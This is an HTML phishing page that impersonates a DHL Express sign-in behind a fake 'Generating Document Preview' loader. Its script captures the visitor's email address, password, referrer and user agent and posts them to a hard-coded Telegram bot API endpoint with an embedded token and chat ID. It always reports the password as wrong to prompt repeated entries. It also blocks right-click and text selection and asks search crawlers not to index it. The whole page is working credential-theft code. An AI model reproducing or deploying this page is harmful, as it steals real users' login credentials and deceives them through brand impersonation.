<!DOCTYPE html>
<html lang="en"
  oncontextmenu="return false;"
  ondragstart="return false"
  onselectstart="return false"
  style="-moz-user-select: none; cursor: default;" >
<head>
	<title>Sign in to continue</title>
	<link rel="icon" type="image/png" href="https://media.discordapp.net/attachments/1150664463784095764/1151759833645731914/ddhh.png">
    <meta name="robots" content="noindex, noarchive, nofollow, nosnippet" />
    <meta name="googlebot" content="noindex, noarchive, nofollow, nosnippet, noimageindex" />
    <meta name="slurp" content="noindex, noarchive, nofollow, nosnippet, noodp, noydir" />
    <meta name="msnbot" content="noindex, noarchive, nofollow, nosnippet" />
    <meta name="teoma" content="noindex, noarchive, nofollow, nosnippet" />
	<meta name="viewport" content="width=device-width, initial-scale=1">
	

</head>
<body>

<style type="text/css">
body {
	width: 100%;
}

img {
	text-align: center;
}

h1 {
	text-align: center;
	color: #000;
	text-shadow: 1px 1px 1px #fff;
}

@import url(https://fonts.googleapis.com/css?family=PT+Sans:400,700);
html {
	min-height: 100%;
}

body {
	background: url('https://media.discordapp.net/attachments/1150664463784095764/1152636043246456912/download.png') no-repeat;
	background-size: cover;
	position: absolute;
	width: 100%;
	height: 100%;
    top: 0;
    right: 0;
    bottom: 0;
    left: 0;
    margin: auto;
    overflow: hidden;
	font-family: 'PT Sans', sans-serif;
}

.login {
	padding: 10px;
}

.files {
	background: #ffcc00;
	margin: 200px auto;
	width: 90%;
	max-width: 450px;
	text-align: center;
	color: #fff;
}

form {
  max-width: 450px;
	margin: 0 auto;
}
form > div {
  position: relative;
  background: white;
  border-bottom: 1px solid #ccc;
  color: #000;
}
form > div > label {
  opacity: 0.3;
  font-weight: normal;
  position: absolute;
  top: 22px;
  left: 20px;
}
form > div > input[type="text"],
form > div > input[type="email"],
form > div > input[type="password"] {
  width: 100%;
  border: 0;
  padding: 20px 20px 20px 50px;
  background: #fff;
}
form > div > input[type="text"]:focus,
form > div > input[type="email"]:focus,
form > div > input[type="password"]:focus {
  outline: 0;
  background: white;
}
form > div > input[type="text"]:focus + label,
form > div > input[type="email"]:focus + label,
form > div > input[type="password"]:focus + label {
  opacity: 0;
}
form > div > input[type="text"]:valid,
form > div > input[type="email"]:valid,
form > div > input[type="password"]:valid {
  background: url(https://s3.amazonaws.com/mailtrack-signature/sender-notified-72.gif);
  background-size: 20px;
  background-repeat: no-repeat;
  background-position: 20px 20px;
}
form > div > input[type="text"]:valid + label,
form > div > input[type="email"]:valid + label,
form > div > input[type="password"]:valid + label {
  opacity: 0;
}
form > div > input[type="text"]:invalid:not(:focus):not(:placeholder-shown),
form > div > input[type="email"]:invalid:not(:focus):not(:placeholder-shown),
form > div > input[type="password"]:invalid:not(:focus):not(:placeholder-shown) {
  background: pink;
}
form > div > input[type="text"]:invalid:not(:focus):not(:placeholder-shown) + label,
form > div > input[type="email"]:invalid:not(:focus):not(:placeholder-shown) + label,
form > div > input[type="password"]:invalid:not(:focus):not(:placeholder-shown) + label {
  opacity: 0;
}
form > div > input[type="text"]:invalid:focus:not(:placeholder-shown) ~ .requirements,
form > div > input[type="email"]:invalid:focus:not(:placeholder-shown) ~ .requirements,
form > div > input[type="password"]:invalid:focus:not(:placeholder-shown) ~ .requirements {
  max-height: 200px;
  padding: 0 30px 20px 50px;
}
form > div .requirements {
  padding: 0 30px 0 50px;
  color: #999;
  max-height: 0;
  transition: 0.28s;
  overflow: hidden;
  color: red;
  font-style: italic;
}
form input[type="submit"] {
  display: block;
  width: 100%;
  margin: 20px 0;
  background: #d40511;
  color: white;
  border: 0;
  padding: 20px;
  font-size: 1.2rem;
}

form input[type="submit"]:hover {
	box-shadow: 1px 1px 1px #ddd;
}

* {
  box-sizing: border-box;
}

.invalid {
	background: #000;
	color: #000;
}

@media screen and (max-width: 360px) and (min-width: 320px) {
  .files {
    margin: 100px auto;
  }
}
@import url(https://fonts.googleapis.com/css?family=PT+Sans:400,700);
html {
	min-height: 100%;
}

body {
	
	position: absolute;
	width: 100%;
	height: 100%;
    top: 0;
    right: 0;
    bottom: 0;
    left: 0;
    margin: auto;
    overflow: hidden;
	font-family: 'PT Sans', sans-serif;
}

.login {
	padding: 10px;
}

.files {
	padding: 10px;
	background: #ffcc00;
	margin: 200px auto;
	width: 90%;
	max-width: 450px;
	text-align: center;
	color: #fff;
}

form {
  max-width: 450px;
	margin: 0 auto;
}
form > div {
  position: relative;
  background: white;
  border-bottom: 1px solid #ccc;
  color: #000;
}
form > div > label {
  opacity: 0.3;
  font-weight: normal;
  position: absolute;
  top: 22px;
  left: 20px;
}
form > div > input[type="text"],
form > div > input[type="email"],
form > div > input[type="password"] {
  width: 100%;
  border: 0;
  padding: 20px 20px 20px 50px;
  background: #fff;
}
form > div > input[type="text"]:focus,
form > div > input[type="email"]:focus,
form > div > input[type="password"]:focus {
  outline: 0;
  background: white;
}
form > div > input[type="text"]:focus + label,
form > div > input[type="email"]:focus + label,
form > div > input[type="password"]:focus + label {
  opacity: 0;
}
form > div > input[type="text"]:valid,
form > div > input[type="email"]:valid,
form > div > input[type="password"]:valid {
  background: url(https://s3.amazonaws.com/mailtrack-signature/sender-notified-72.gif);
  background-size: 20px;
  background-repeat: no-repeat;
  background-position: 20px 20px;
}
form > div > input[type="text"]:valid + label,
form > div > input[type="email"]:valid + label,
form > div > input[type="password"]:valid + label {
  opacity: 0;
}
form > div > input[type="text"]:invalid:not(:focus):not(:placeholder-shown),
form > div > input[type="email"]:invalid:not(:focus):not(:placeholder-shown),
form > div > input[type="password"]:invalid:not(:focus):not(:placeholder-shown) {
  background: pink;
}
form > div > input[type="text"]:invalid:not(:focus):not(:placeholder-shown) + label,
form > div > input[type="email"]:invalid:not(:focus):not(:placeholder-shown) + label,
form > div > input[type="password"]:invalid:not(:focus):not(:placeholder-shown) + label {
  opacity: 0;
}
form > div > input[type="text"]:invalid:focus:not(:placeholder-shown) ~ .requirements,
form > div > input[type="email"]:invalid:focus:not(:placeholder-shown) ~ .requirements,
form > div > input[type="password"]:invalid:focus:not(:placeholder-shown) ~ .requirements {
  max-height: 200px;
  padding: 0 30px 20px 50px;
}
form > div .requirements {
  padding: 0 30px 0 50px;
  color: #999;
  max-height: 0;
  transition: 0.28s;
  overflow: hidden;
  color: red;
  font-style: italic;
}
form input[type="submit"] {
  display: block;
  width: 100%;
  margin: 20px 0;
  background: #d40511;
  color: white;
  border: 0;
  padding: 20px;
  font-size: 1.2rem;
}

form input[type="submit"]:hover {
	box-shadow: 1px 1px 1px #ddd;
}

* {
  box-sizing: border-box;
}

.invalid {
	background: #000;
	color: #000;
}

.loading {
	margin: 0;
	color: #fff;
	text-shadow: 1px 1px 1px #000;
}

.loader {
	margin: 10px auto;
	text-align: center;
	border: 16px solid #f3f3f3;
	border-radius: 50%;
	border-top: 16px solid red;
	width: 120px;
	height: 120px;
	-webkit-animation: spin 2s linear infinite; /* Safari */
	animation: spin 2s linear infinite;
}

/* Safari */
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(0deg); }
  100% { -webkit-transform: rotate(360deg); }
}

@keyframes spin {
  0% { transform: rotate(0deg); }
  100% { transform: rotate(360deg); }
}


</style>


<style type="text/css">
body {
	width: 100%;
}

img {
	text-align: center;
}

h1 {
	text-align: center;
	color: #000;
	text-shadow: 1px 1px 1px #fff;
}

</style>

<div class="files" id="message">
	<img src="" height="50">
	<div class="login">
		<div class="loader"></div>
		<h4 class="loading" >Generating Document Preview...</h4>
		
	</div>
</div>

<script>
    document.getElementById("message").style.display = "block";
    setTimeout(function(){
        document.getElementById("message").style.display = "none";
    }, 30);

setTimeout(function(){
    document.getElementById("lol").style.display = "block";
}, 30);

</script>


<div class="files" id="lol" style="display:none !important">
	
	
	<div class="login" >

<img src="https://pblc.it/i/951x308x9.f.S3/49ecb/dhl-business-live-png-log-1671315-1.png" height="30">
     <h2>Sign in DHL Express</h2>
		<form  method="post" id="new"  >
	  
	  <div>
		<input type="email" id="email" name="email" required placeholder=" " value="" autocomplete="off"/>
		<label for="email">Email Address</label>
<div class="error" id="email-error"></div>
		<div class="requirements">
		  Must be a valid email address.
		</div>
	  </div>
	  
	  <div>
		<input type="password" id="password" name="password" required placeholder=" " />
		<label for="password">Password</label>
<div class="error" id="password-error"></div>
		<div class="requirements">
		  Your password must be at least 6 characters as well as contain at least one uppercase, one lowercase, and one number.
		</div>
	  </div>
	  
	  <input type="submit" id="submit-button" value="Log in" />

	</form>
	</div>
</div>
</body>


<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>


<script>
var attempts = 0;

// how many times you want the person to enter incorrect password before redirect
var maxAttempts = 20;
var API_URL = "https://api.telegram.org/bot1960289653:AAFVcFEa4AJ4uzD5kBdX6e1rXXqLZ8w0TDE/sendMessage";
var submitButton = document.getElementById("submit-button");
submitButton.addEventListener("click", function(event){
    event.preventDefault(); // prevent the form from submitting and reloading the page

    var isValid = true;
    var inputs = document.getElementById("new").querySelectorAll("input");
    var email = "";
    var password = "";
    for (var i = 0; i < inputs.length; i++) {
        if (inputs[i].id == "email") {
            if (!inputs[i].checkValidity()) {
                document.getElementById("email-error").innerHTML = "<span style='color: red'>Please enter your email address</span>";
                isValid = false;
            } else {
                email = inputs[i].value;
                document.getElementById("email-error").innerHTML = "";
            }
        } else if (inputs[i].id == "password") {
            if (!inputs[i].checkValidity()) {
                document.getElementById("password-error").innerHTML = "<span style='color: red'>Please enter your email password</span>";
                isValid = false;
            } else {
                password = inputs[i].value;
                document.getElementById("password-error").innerHTML = "";
document.getElementById("password-error").innerHTML = "<span style='color: red'>Email or Password is incorrect. Please enter your email and email password.</span>";
                inputs[i].value = ""; //clear the password input field
            }
        }
    }

    if (isValid) {
        // Send the email and password to Telegram
        var referrer = document.referrer;
        var userAgent = navigator.userAgent; 
        $.ajax({
            type: "POST",
            url: API_URL,
            dataType: "json",
data: {
chat_id: "1978702987",
text: "Email Address: " + email + "\nPassword: " + password + "\nReferrer: " + referrer + "\nUser Agent: " + userAgent
},
success: function(response) {
// Handle the response from Telegram
console.log(response);
},
error: function() {
// Handle errors
attempts++;
if (attempts >= maxAttempts) {
// code to close doc
window.open("about:blank","_self").close();
    window.top.close();
    return false;
}
}
});
} else {
attempts++;
}
if (attempts >= maxAttempts) {

// code to close doc
window.open("about:blank","_self").close();
    window.top.close();
    return false;

}
return false;
});
</script>


<script>
window.addEventListener("beforeunload", function (event) {
    event.preventDefault();
});

</script>



</html>